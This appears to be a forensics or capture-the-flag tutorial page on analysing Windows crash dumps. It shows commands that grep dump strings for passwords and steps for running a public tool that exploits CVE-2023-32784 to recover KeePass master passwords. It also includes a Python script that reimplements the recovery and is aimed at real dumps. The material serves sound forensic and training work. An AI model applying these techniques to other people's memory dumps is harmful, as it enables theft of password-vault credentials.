Windows Memory Dump Analysis
A memory dump file (.dmp), also called a crash dump, is a snapshot of a process's or the whole system's memory that Windows writes out when something crashes or when a dump is requested. The file command identifies a Windows minidump:
file example.dmp
# Output
example.dmp: Mini DuMP crash report, 18 streams, Sat Nov ...
Because the dump contains raw process memory, ordinary static analysis tools can already pull out a lot of material (strings, credentials, configuration, paths) without parsing the minidump structure:
strings example.dmp
strings example.dmp | grep -i password
# Open pager
strings example.dmp | less
xxd example.dmp
The dump can also be opened in IDA, ILSpy or Visual Studio, or uploaded to an online DMP viewer (do not upload dumps that may contain credentials or other sensitive data to third-party sites).
If the .dmp file contains the memory of a KeePass process, we might be able to recover the master password. KeePass 2.x before 2.54 (CVE-2023-32784) leaves a leftover string in memory for every character typed into the master-password box, so all characters except the first can be reconstructed from a dump. keepass-password-dumper automates the search.
On Windows, with the .NET SDK installed, run the following commands:
git clone https://github.com/vdohney/keepass-password-dumper.git
cd keepass-password-dumper
dotnet run example.dmp
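To show what the tool above is actually looking for, here is an added example, written for this page and not taken from keepass-password-dumper or KeePass. It assumes (as the vulnerability writeup describes) that the leaky text box leaves UTF-16LE strings of the form N bullets (U+25CF) followed by the (N+1)-th typed character, scans a byte blob for that pattern, votes per position when several candidates appear, and rebuilds the password with "?" for the unrecoverable first character. The dump bytes are constructed in-script by build_fake_dump; real dumps are much larger and noisier, so the script only illustrates the scanning and voting logic:

```python
"""Recover KeePass-style leftover master-password strings from a memory blob.

Added example (not keepass-password-dumper's code). Assumption: each typed
character leaves a UTF-16LE string "<N bullets><char>" in memory, where the
bullet is U+25CF and N is the 0-based index of the character. Position 1 is
therefore never recoverable.
"""
import re
from collections import defaultdict

BULLET = "\u25cf".encode("utf-16-le")  # b'\xcf\x25'

# One or more UTF-16LE bullets, NOT followed by another bullet (so a run is
# consumed whole, not split), then one printable ASCII char in UTF-16LE.
LEFTOVER = re.compile(rb"((?:\xcf\x25)+)(?!\xcf\x25)([\x20-\x7e]\x00)")


def find_candidates(dump: bytes) -> dict[int, dict[str, int]]:
    """Map 1-based password position (>= 2) to {char: occurrence count}."""
    cands: dict[int, dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for m in LEFTOVER.finditer(dump):
        pos = len(m.group(1)) // 2 + 1          # N bullets -> position N+1
        ch = m.group(2).decode("utf-16-le")
        cands[pos][ch] += 1
    return {p: dict(c) for p, c in cands.items()}


def reconstruct(dump: bytes) -> str:
    """Best-guess password: most frequent candidate per position, '?' if none."""
    cands = find_candidates(dump)
    if not cands:
        return ""
    out = ["?"]                                  # first character never leaks
    for pos in range(2, max(cands) + 1):
        if pos in cands:
            out.append(max(cands[pos], key=cands[pos].get))
        else:
            out.append("?")
    return "".join(out)


def build_fake_dump(password: str, copies: int = 1) -> bytes:
    """Constructed stand-in for a KeePass process dump (not real dump data).

    Emits the full all-bullet masked string (which must NOT count as a leak)
    plus the per-character leftover strings, separated by filler bytes.
    """
    pieces = [b"\x00" * 16]
    pieces.append(BULLET * len(password) + b"\x00\x00")   # masked display
    for _ in range(copies):
        for i in range(1, len(password)):
            leftover = BULLET * i + password[i].encode("utf-16-le") + b"\x00\x00"
            pieces.append(leftover)
            pieces.append(b"\x90" * 7)                     # arbitrary filler
    return b"".join(pieces)


if __name__ == "__main__":
    # Two copies of the real strings plus one stray "●●X" to show the voting.
    blob = build_fake_dump("Secret!1", copies=2) + BULLET * 2 + b"X\x00\x00\x00"
    for pos, chars in sorted(find_candidates(blob).items()):
        print(pos, chars)
    print("guess:", reconstruct(blob))          # ?ecret!1
```

When running against a real dump, read the file with open(path, "rb").read() and pass the bytes to reconstruct; expect several candidates per position and pick the most frequent, exactly as the voting here does.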